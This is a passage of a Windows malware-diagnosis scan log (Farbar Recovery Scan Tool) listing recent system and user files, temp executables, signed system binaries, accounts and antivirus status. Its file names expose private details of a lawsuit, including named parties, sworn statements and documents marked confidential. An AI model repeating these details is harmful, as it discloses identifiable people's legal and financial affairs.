2016-06-15 01:11 - 2016-05-27 23:17 - 00415232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-06-15 01:11 - 2016-05-27 23:17 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-06-15 01:11 - 2016-05-27 23:17 - 00278016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2016-06-15 01:11 - 2016-05-27 23:17 - 00173056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmmigrator.dll
2016-06-15 01:11 - 2016-05-27 23:16 - 00690176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2016-06-15 01:11 - 2016-05-27 23:16 - 00684544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StructuredQuery.dll
2016-06-15 01:11 - 2016-05-27 23:16 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2016-06-15 01:11 - 2016-05-27 23:16 - 00291328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\polstore.dll
2016-06-15 01:11 - 2016-05-27 23:16 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore6.dll
2016-06-15 01:11 - 2016-05-27 23:15 - 00579072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gpprefcl.dll
2016-06-15 01:11 - 2016-05-27 23:15 - 00535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2016-06-15 01:11 - 2016-05-27 23:15 - 00293888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore.dll
2016-06-15 01:11 - 2016-05-27 23:15 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
2016-06-15 01:11 - 2016-05-27 23:14 - 03292672 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d12warp.dll
2016-06-15 01:11 - 2016-05-27 23:14 - 00965632 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2016-06-15 01:11 - 2016-05-27 23:14 - 00219136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2016-06-15 01:11 - 2016-05-27 23:14 - 00200192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2016-06-15 01:11 - 2016-05-27 23:13 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-06-15 01:11 - 2016-05-27 23:13 - 00990208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-06-15 01:11 - 2016-05-27 23:13 - 00954368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2016-06-15 01:11 - 2016-05-27 23:13 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-06-15 01:11 - 2016-05-27 23:13 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2016-06-15 01:11 - 2016-05-27 23:13 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2016-06-15 01:11 - 2016-05-27 23:12 - 00521728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StructuredQuery.dll
2016-06-15 01:11 - 2016-05-27 23:11 - 02470912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d12warp.dll
2016-06-15 01:11 - 2016-05-27 23:11 - 01445888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRHInproc.dll
2016-06-15 01:11 - 2016-05-27 23:11 - 00799744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2016-06-15 01:11 - 2016-05-27 23:11 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\httpprxm.dll
2016-06-15 01:11 - 2016-05-27 23:09 - 01073152 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-06-15 01:11 - 2016-05-27 23:04 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-06-15 01:11 - 2016-05-27 23:04 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-06-15 01:11 - 2016-05-27 23:03 - 00693760 _____ (Microsoft Corporation) C:\WINDOWS\system32\internetmail.dll
2016-06-15 01:11 - 2016-05-27 23:03 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2016-06-15 01:11 - 2016-05-27 23:02 - 00103424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2016-06-15 01:11 - 2016-05-27 23:01 - 01500160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-06-15 01:11 - 2016-05-27 23:01 - 00111104 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2016-06-15 01:11 - 2016-05-27 23:00 - 02230272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-06-15 01:11 - 2016-05-27 23:00 - 01730560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-06-15 01:11 - 2016-05-27 23:00 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2016-06-15 01:11 - 2016-05-27 23:00 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2016-06-15 01:11 - 2016-05-27 23:00 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-06-15 01:11 - 2016-05-27 22:59 - 00176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2016-06-15 01:11 - 2016-05-27 22:58 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-06-15 01:11 - 2016-05-27 22:55 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-06-15 01:11 - 2016-05-27 22:53 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcpopkeysrv.dll
2016-06-13 13:37 - 2016-06-13 13:37 - 00104442 _____ C:\Users\mkt\Downloads\160609 ANSWER TO COMPLAINT MKTsigned.pdf
2016-06-11 11:08 - 2016-06-11 11:08 - 00057602 _____ C:\Users\mkt\Documents\Slip Listing.PDF
2016-06-10 15:19 - 2016-06-10 15:20 - 00000000 ____D C:\Users\mkt\AppData\Roaming\TheFormTool
2016-06-08 19:10 - 2016-06-08 19:10 - 00010330 _____ C:\Users\mkt\Documents\Pre-bill Worksheet.PDF
2016-06-08 17:26 - 2016-06-08 17:26 - 00135732 _____ C:\Users\mkt\Downloads\6512078179_052616_1652.pdf
2016-06-07 21:06 - 2016-06-07 21:06 - 00185835 _____ C:\Users\mkt\Downloads\14-10796.pdf
2016-06-07 20:30 - 2016-06-07 20:30 - 00922856 _____ C:\Users\mkt\Documents\Envelopes.PDF
2016-06-07 18:57 - 2016-06-07 18:57 - 00191722 _____ C:\Users\mkt\Documents\court fees 2016.xml
2016-06-07 12:39 - 2016-06-07 12:39 - 00067534 _____ C:\Users\mkt\Downloads\elecdi01_1.pdf
2016-06-06 17:50 - 2016-06-06 17:50 - 00063419 _____ C:\Users\mkt\Downloads\notice no bond (2).pdf
2016-06-06 10:41 - 2016-06-06 10:41 - 00000530 _____ C:\Users\mkt\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sharepoint (2).lnk
2016-06-03 16:52 - 2016-06-03 16:52 - 00062724 _____ C:\Users\mkt\Downloads\notice no bond (1).pdf
2016-06-03 16:47 - 2016-06-03 16:47 - 00001946 _____ C:\Users\mkt\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SharePoint.lnk
2016-06-03 16:32 - 2016-06-03 16:32 - 00062724 _____ C:\Users\mkt\Downloads\notice no bond.pdf
2016-06-03 13:49 - 2015-06-10 19:55 - 00089903 _____ C:\Users\mkt\Documents\Defendants' Deficient Discovery Response-signed (1).pdf
2016-06-02 22:52 - 2016-06-02 22:52 - 00015832 _____ C:\Users\mkt\Documents\Funds Account Listing.PDF
2016-06-01 20:56 - 2016-06-21 15:18 - 00000000 ____D C:\Users\mkt\Documents\Evercontact
2016-06-01 20:56 - 2016-06-01 20:56 - 00000000 ____D C:\Users\mkt\Documents\Add-in Express
2016-06-01 17:41 - 2016-06-01 17:41 - 00088446 _____ C:\Users\mkt\Downloads\160601-Reply Brief MKT FINAL (1).pdf
2016-06-01 17:40 - 2016-06-01 17:40 - 00876389 _____ C:\Users\mkt\Downloads\Reply Aff Galstad Exh.pdf
2016-06-01 17:35 - 2016-06-01 17:35 - 00088446 _____ C:\Users\mkt\Downloads\160601-Reply Brief MKT FINAL.pdf
2016-05-31 16:28 - 2016-05-31 16:28 - 00027124 _____ C:\Users\mkt\Downloads\Montpetit vs Montpetit.pdf
2016-05-31 15:42 - 2016-05-31 15:42 - 00882277 _____ C:\Users\mkt\Downloads\First Supplemental Statement of Mary Starr 5-31-16 (2).pdf
2016-05-31 15:18 - 2016-05-31 15:18 - 00882277 _____ C:\Users\mkt\Downloads\First Supplemental Statement of Mary Starr 5-31-16 (1).pdf
2016-05-31 15:17 - 2016-05-31 15:17 - 00029719 _____ C:\Users\mkt\Downloads\Nagios vs. Computer Forensic.pdf
2016-05-31 15:11 - 2016-05-31 15:11 - 00882277 _____ C:\Users\mkt\Downloads\First Supplemental Statement of Mary Starr 5-31-16.pdf
2016-05-31 15:11 - 2016-05-31 15:11 - 00432683 _____ C:\Users\mkt\Downloads\Separate Answer of Def. Mary Starr 5-31-16.pdf
2016-05-31 13:24 - 2016-05-31 13:24 - 00013969 _____ C:\Users\mkt\Documents\Fwd_ 5_4 Meeting Summary.pdf
2016-05-31 00:32 - 2016-05-31 00:32 - 00054422 _____ C:\Users\mkt\Downloads\Exhibit A (7).pdf
2016-05-31 00:32 - 2016-05-31 00:32 - 00026792 _____ C:\Users\mkt\Downloads\Defendant Computer Forensic Services, LLC's Memorandum in Opposition to Plaintiff's Motion for a Temporary Restraining Order (2).pdf
2016-05-31 00:32 - 2016-05-31 00:32 - 00023845 _____ C:\Users\mkt\Downloads\Sworn Statement of Mark Lanterman (1).pdf
2016-05-31 00:31 - 2016-05-31 00:31 - 00340360 _____ C:\Users\mkt\Downloads\Defendant Mary Starr's MOL in Opposition to Plaintiff's Moton for TRO 5-27-16 (3).pdf
2016-05-31 00:31 - 2016-05-31 00:31 - 00271471 _____ C:\Users\mkt\Downloads\Exhibit B (2).pdf
2016-05-31 00:30 - 2016-05-31 00:30 - 00258163 _____ C:\Users\mkt\Downloads\Sworn Statment of Mary Starr 5-27-16 (2).pdf
2016-05-31 00:29 - 2016-05-31 00:29 - 01083572 _____ C:\Users\mkt\Downloads\Sworn Statement of Walter Bauch 5-27-16 (2).pdf
2016-05-31 00:29 - 2016-05-31 00:29 - 00188993 _____ C:\Users\mkt\Downloads\Confiidential Exhibit 6 to Sworn Statement of Walter Bauch 5-27-16 (2).pdf
2016-05-31 00:29 - 2016-05-31 00:29 - 00067247 _____ C:\Users\mkt\Downloads\160527-Second Amended NOMAM TRO (6).pdf
2016-05-31 00:29 - 2016-05-31 00:29 - 00025941 _____ C:\Users\mkt\Downloads\Confidential Financial Source Form Cover Sheet 5-27-16 (2).pdf
2016-05-31 00:28 - 2016-05-31 00:28 - 00067247 _____ C:\Users\mkt\Downloads\160527-Second Amended NOMAM TRO (5).pdf
2016-05-31 00:20 - 2016-05-31 00:20 - 05090271 _____ C:\Users\mkt\Downloads\Galstad Aff exhibits (3).pdf
2016-05-31 00:19 - 2016-05-31 00:19 - 05090271 _____ C:\Users\mkt\Downloads\Galstad Aff exhibits (2).pdf
2016-05-31 00:19 - 2016-05-31 00:19 - 00188289 _____ C:\Users\mkt\Downloads\160525--Memo Law Support TRO-FINAL (2).pdf
2016-05-31 00:14 - 2016-05-31 00:14 - 00803431 _____ C:\Users\mkt\Downloads\160525 MKT Aff and ExhibitFINAL2 (2).pdf
2016-05-31 00:14 - 2016-05-31 00:14 - 00803431 _____ C:\Users\mkt\Downloads\160525 MKT Aff and ExhibitFINAL2 (1).pdf
2016-05-31 00:05 - 2016-05-31 00:05 - 00088349 _____ C:\Users\mkt\Downloads\160526-Ramsey civil assingments.pdf
2016-05-31 00:05 - 2016-05-31 00:05 - 00066719 _____ C:\Users\mkt\Downloads\160526-Amended NOMAM TRO.pdf
2016-05-31 00:04 - 2016-05-31 00:04 - 00167585 _____ C:\Users\mkt\Downloads\160526-Notice Removal Judge.pdf
2016-05-29 18:31 - 2016-05-29 18:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TIDAL
2016-05-29 18:31 - 2016-05-29 18:31 - 00000000 ____D C:\Program Files (x86)\TIDAL
2016-05-27 17:30 - 2016-05-27 17:30 - 00188993 _____ C:\Users\mkt\Downloads\Confiidential Exhibit 6 to Sworn Statement of Walter Bauch 5-27-16 (1).pdf
2016-05-27 17:29 - 2016-05-27 17:29 - 00025941 _____ C:\Users\mkt\Downloads\Confidential Financial Source Form Cover Sheet 5-27-16 (1).pdf
2016-05-27 17:28 - 2016-05-27 17:28 - 01083572 _____ C:\Users\mkt\Downloads\Sworn Statement of Walter Bauch 5-27-16 (1).pdf
2016-05-27 17:28 - 2016-05-27 17:28 - 00340360 _____ C:\Users\mkt\Downloads\Defendant Mary Starr's MOL in Opposition to Plaintiff's Moton for TRO 5-27-16 (2).pdf
2016-05-27 17:28 - 2016-05-27 17:28 - 00258163 _____ C:\Users\mkt\Downloads\Sworn Statment of Mary Starr 5-27-16 (1).pdf
2016-05-27 17:24 - 2016-05-27 17:24 - 00258163 _____ C:\Users\mkt\Downloads\Sworn Statment of Mary Starr 5-27-16.pdf
2016-05-27 17:23 - 2016-05-27 17:23 - 01083572 _____ C:\Users\mkt\Downloads\Sworn Statement of Walter Bauch 5-27-16.pdf
2016-05-27 17:23 - 2016-05-27 17:23 - 00188993 _____ C:\Users\mkt\Downloads\Confiidential Exhibit 6 to Sworn Statement of Walter Bauch 5-27-16.pdf
2016-05-27 17:23 - 2016-05-27 17:23 - 00067247 _____ C:\Users\mkt\Downloads\160527-Second Amended NOMAM TRO (4).pdf
2016-05-27 17:23 - 2016-05-27 17:23 - 00025941 _____ C:\Users\mkt\Downloads\Confidential Financial Source Form Cover Sheet 5-27-16.pdf
2016-05-27 17:09 - 2016-05-27 17:09 - 00067247 _____ C:\Users\mkt\Downloads\160527-Second Amended NOMAM TRO (3).pdf
2016-05-27 17:09 - 2016-05-27 17:09 - 00067247 _____ C:\Users\mkt\Downloads\160527-Second Amended NOMAM TRO (2).pdf
2016-05-27 17:09 - 2016-05-27 17:09 - 00067247 _____ C:\Users\mkt\Downloads\160527-Second Amended NOMAM TRO (1).pdf
2016-05-27 17:07 - 2016-05-27 17:07 - 00067247 _____ C:\Users\mkt\Downloads\160527-Second Amended NOMAM TRO.pdf
2016-05-27 14:58 - 2016-05-27 14:58 - 00340360 _____ C:\Users\mkt\Downloads\Defendant Mary Starr's MOL in Opposition to Plaintiff's Moton for TRO 5-27-16 (1).pdf
2016-05-27 14:17 - 2016-05-27 14:17 - 00340360 _____ C:\Users\mkt\Downloads\Defendant Mary Starr's MOL in Opposition to Plaintiff's Moton for TRO 5-27-16.pdf
2016-05-27 13:16 - 2016-05-27 13:16 - 00026792 _____ C:\Users\mkt\Downloads\Defendant Computer Forensic Services, LLC's Memorandum in Opposition to Plaintiff's Motion for a Temporary Restraining Order (1).pdf
2016-05-27 13:07 - 2016-05-27 13:07 - 00020003 _____ C:\Users\mkt\Downloads\Defendant Computer Forensic Services, LLC's Memorandum in Opposition to Plaintiff's Motion for a Temporary Restraining Order.pdf
2016-05-27 13:03 - 2016-05-27 13:03 - 00019822 _____ C:\Users\mkt\Downloads\Sworn Statement of Mark Lanterman.pdf
2016-05-27 13:02 - 2016-05-27 13:02 - 00055052 _____ C:\Users\mkt\Downloads\Exhibit A (6).pdf
2016-05-27 13:00 - 2016-05-27 13:00 - 00265469 _____ C:\Users\mkt\Downloads\Exhibit B (1).pdf
2016-05-25 16:03 - 2016-05-25 16:03 - 00188289 _____ C:\Users\mkt\Downloads\160525--Memo Law Support TRO-FINAL (1).pdf
2016-05-25 14:38 - 2016-05-25 14:38 - 00696360 _____ C:\Users\mkt\Downloads\160525 MKT Aff and ExhibitFINAL2.pdf
2016-05-25 14:37 - 2016-05-25 14:37 - 04015552 _____ C:\Users\mkt\Downloads\Galstad Aff exhibits.pdf
2016-05-25 14:37 - 2016-05-25 14:37 - 04015552 _____ C:\Users\mkt\Downloads\Galstad Aff exhibits (1).pdf
2016-05-25 14:37 - 2016-05-25 14:37 - 00165777 _____ C:\Users\mkt\Downloads\160525--Memo Law Support TRO-FINAL.pdf
2016-05-24 16:10 - 2016-05-24 16:10 - 00038666 _____ C:\Users\mkt\Downloads\Document (2).pdf
2016-05-24 14:55 - 2016-05-24 14:55 - 00291568 _____ C:\Users\mkt\Downloads\160524-NOTICE OF MOTION AND MOTION TO DISMISS--MKT (1).pdf
2016-05-24 14:54 - 2016-05-24 14:54 - 00092363 _____ C:\Users\mkt\Downloads\160524-Rule 11 NOMAM-MKT.pdf
2016-05-24 14:54 - 2016-05-24 14:54 - 00063892 _____ C:\Users\mkt\Downloads\160523-NOMAM TRO.pdf
2016-05-24 14:54 - 2016-05-24 14:54 - 00037827 _____ C:\Users\mkt\Downloads\Affidavit of Service on Computer Forensic Services Inc.pdf
2016-05-24 14:53 - 2016-05-24 14:53 - 00124949 _____ C:\Users\mkt\Downloads\160520-COMPLAINT.pdf
2016-05-24 14:53 - 2016-05-24 14:53 - 00067829 _____ C:\Users\mkt\Downloads\Summons.pdf
2016-05-24 14:51 - 2016-05-24 14:51 - 02228892 _____ C:\Users\mkt\Downloads\Civil Cover Sheet (002).pdf
2016-05-24 14:50 - 2016-05-24 14:50 - 00034690 _____ C:\Users\mkt\Downloads\Affidavit of Service on Mary Starr.pdf
2016-05-24 14:49 - 2016-05-24 14:49 - 00291568 _____ C:\Users\mkt\Downloads\160524-NOTICE OF MOTION AND MOTION TO DISMISS--MKT.pdf
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-06-23 10:00 - 2015-12-20 20:50 - 00962052 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-06-23 10:00 - 2015-10-30 02:21 - 00000000 ____D C:\WINDOWS\INF
2016-06-23 09:59 - 2015-12-20 22:47 - 00000000 ____D C:\Program Files\AMD
2016-06-23 09:58 - 2016-02-17 18:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2016-06-23 08:52 - 2015-12-20 22:49 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-06-23 08:52 - 2015-12-20 22:37 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-06-23 08:52 - 2015-12-20 22:37 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-06-23 08:52 - 2015-12-20 22:20 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-06-23 08:52 - 2015-12-20 22:11 - 00000000 ___RD C:\Users\mkt\OneDrive
2016-06-23 08:52 - 2015-12-20 22:07 - 00000120 _____ C:\WINDOWS\system32\config\netlogon.ftl
2016-06-23 08:51 - 2015-10-30 01:28 - 00786432 ___SH C:\WINDOWS\system32\config\BBI
2016-06-23 08:36 - 2015-12-20 22:20 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-06-23 06:08 - 2015-10-30 02:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-06-23 06:08 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-06-23 05:05 - 2015-12-20 22:35 - 00004146 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{F700465E-3430-4551-9500-2713933D0D72}
2016-06-23 02:25 - 2015-12-20 22:48 - 00000000 ____D C:\Users\mkt\AppData\Local\Adobe
2016-06-22 23:59 - 2015-12-20 22:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-06-22 23:02 - 2015-12-11 21:02 - 00000000 ____D C:\Users\mkt\Documents\Custom Office Templates
2016-06-22 17:03 - 2015-12-21 01:01 - 00000000 ____D C:\Users\mkt\Documents\Timeslips Backups
2016-06-22 16:34 - 2015-12-20 22:10 - 00000000 ____D C:\Users\mkt\AppData\Local\Packages
2016-06-22 14:22 - 2016-02-29 14:27 - 00000000 ____D C:\Users\mkt\Documents\MKTCache
2016-06-22 11:36 - 2015-12-20 22:36 - 00000000 _____ C:\Users\mkt\AppData\LocalLow\rightsCheck_1.txt
2016-06-22 10:41 - 2016-02-29 19:53 - 00000000 ____D C:\Users\mkt\Documents\Recovered
2016-06-22 10:41 - 2016-02-25 23:32 - 00000000 ____D C:\WINDOWS\Minidump
2016-06-22 10:41 - 2016-01-07 23:36 - 00000000 ____D C:\Users\mkt\Documents\TS TEMPS
2016-06-22 10:41 - 2015-12-30 12:01 - 00000000 ___SD C:\Users\mkt\Documents\SharePoint Drafts
2016-06-22 10:41 - 2015-12-20 22:46 - 00000000 ___DC C:\WINDOWS\Panther
2016-06-22 10:41 - 2015-12-20 22:21 - 00000000 ____D C:\Users\mkt\AppData\Roaming\Dashlane
2016-06-22 10:39 - 2016-01-21 14:34 - 00000000 ____D C:\ProgramData\53cbbb63-4de7-1
2016-06-22 10:39 - 2016-01-21 14:34 - 00000000 ____D C:\ProgramData\53cbbb63-1a97-0
2016-06-22 10:39 - 2015-12-20 22:43 - 00000000 ____D C:\Program Files (x86)\mbraceToolbar
2016-06-18 10:36 - 2015-12-20 22:20 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-06-17 17:23 - 2015-12-20 22:10 - 00000000 ____D C:\Users\mkt
2016-06-17 16:35 - 2015-10-30 02:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-06-16 11:42 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\rescache
2016-06-16 11:20 - 2015-12-20 21:37 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-06-15 20:02 - 2015-12-20 22:47 - 00517456 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-06-15 20:01 - 2015-10-30 02:24 - 00000000 ___SD C:\WINDOWS\system32\DiagSvcs
2016-06-15 20:01 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-06-15 20:01 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-06-15 16:09 - 2015-10-30 02:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-06-15 16:09 - 2015-10-30 02:24 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-06-15 16:08 - 2016-03-19 20:38 - 00000000 ____D C:\Program Files\Microsoft Office
2016-06-15 15:40 - 2015-12-20 21:59 - 00484008 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2016-06-15 09:44 - 2015-12-20 21:59 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-06-15 09:41 - 2015-12-20 21:59 - 142482544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-06-14 13:33 - 2015-10-30 02:26 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-06-14 13:33 - 2015-10-30 02:26 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-06-08 19:11 - 2015-12-21 00:06 - 00000000 ____D C:\Program Files (x86)\Timeslips
2016-06-08 18:00 - 2015-12-21 00:26 - 00000000 ___RD C:\Users\mkt\Creative Cloud Files
2016-06-07 20:21 - 2016-04-11 20:47 - 00938415 _____ C:\Users\mkt\Documents\SumWksht.PDF
2016-06-07 20:21 - 2016-04-11 20:47 - 00921816 _____ C:\Users\mkt\Documents\InvList.PDF
2016-06-07 19:13 - 2016-03-08 14:41 - 00000000 ____D C:\Users\mkt\AppData\Local\Microsoft Help
2016-06-06 10:40 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-06-02 14:48 - 2015-12-21 01:00 - 00002469 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat DC.lnk
2016-06-02 14:48 - 2015-12-21 01:00 - 00002114 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat Distiller DC.lnk
2016-05-29 18:31 - 2015-12-20 22:23 - 00001918 _____ C:\ProgramData\Microsoft\Windows\Start Menu\TIDAL.lnk
2016-05-28 00:55 - 2015-12-20 20:51 - 02718208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2016-05-25 13:05 - 2015-12-20 22:11 - 00002400 _____ C:\Users\mkt\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
 
==================== Files in the root of some directories =======
 
2016-03-28 14:38 - 2016-04-21 19:36 - 0003010 _____ () C:\Users\mkt\AppData\Roaming\.thetimelineproj.cfg
2015-12-22 01:20 - 2016-05-04 11:47 - 0000033 _____ () C:\Users\mkt\AppData\Roaming\AdobeWLCMCache.dat
2016-04-14 22:56 - 2016-04-15 16:46 - 0038512 _____ () C:\Users\mkt\AppData\Roaming\Comma Separated Values.ADR
2015-12-20 22:47 - 2015-12-20 22:47 - 0000000 _____ () C:\ProgramData\DP45977C.lfl
 
Some files in TEMP:
====================
C:\Users\mkt\AppData\Local\Temp\26c04b30-c694-4618-8b33-81ae55e3ff94__RoonInstaller64_100100094.exe
C:\Users\mkt\AppData\Local\Temp\Abspdf.exe
C:\Users\mkt\AppData\Local\Temp\acfpdfu.dll
C:\Users\mkt\AppData\Local\Temp\acfpdfuamd64.dll
C:\Users\mkt\AppData\Local\Temp\acfpdfui.dll
C:\Users\mkt\AppData\Local\Temp\acfpdfuia64.dll
C:\Users\mkt\AppData\Local\Temp\acfpdfuiamd64.dll
C:\Users\mkt\AppData\Local\Temp\acfpdfuiia64.dll
C:\Users\mkt\AppData\Local\Temp\AMDCleanupUtility.exe
C:\Users\mkt\AppData\Local\Temp\cdintf.dll
C:\Users\mkt\AppData\Local\Temp\Cleanup.dll
C:\Users\mkt\AppData\Local\Temp\ddu.exe
C:\Users\mkt\AppData\Local\Temp\difxapi.dll
C:\Users\mkt\AppData\Local\Temp\msvcm80.dll
C:\Users\mkt\AppData\Local\Temp\msvcp80.dll
C:\Users\mkt\AppData\Local\Temp\msvcr80.dll
C:\Users\mkt\AppData\Local\Temp\PDFPRT400.exe
C:\Users\mkt\AppData\Local\Temp\playstv_patch.exe
C:\Users\mkt\AppData\Local\Temp\radeon-crimson-15.12-minimalsetup.exe
C:\Users\mkt\AppData\Local\Temp\raptrpatch.exe
C:\Users\mkt\AppData\Local\Temp\raptr_stub.exe
C:\Users\mkt\AppData\Local\Temp\xmllite.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-06-16 11:27
 
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-06-2016 01
Ran by mkt (2016-06-23 10:09:20)
Running from D:\Desktop
Windows 10 Pro Version 1511 (X64) (2015-12-21 02:08:05)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-3481980844-658153669-928023180-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3481980844-658153669-928023180-503 - Limited - Disabled)
Guest (S-1-5-21-3481980844-658153669-928023180-501 - Limited - Disabled)
Mark (S-1-5-21-3481980844-658153669-928023180-1002 - Administrator - Enabled) => C:\Users\Mark
QBDataServiceUser25 (S-1-5-21-3481980844-658153669-928023180-1004 - Limited - Enabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
64 Bit HP CIO Components Installer (Version: 18.2.4 - Hewlett-Packard) Hidden
7-Zip 15.14 (x64) (HKLM\...\7-Zip) (Version: 15.14 - Igor Pavlov)
Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version: 15.016.20045 - Adobe Systems Incorporated)
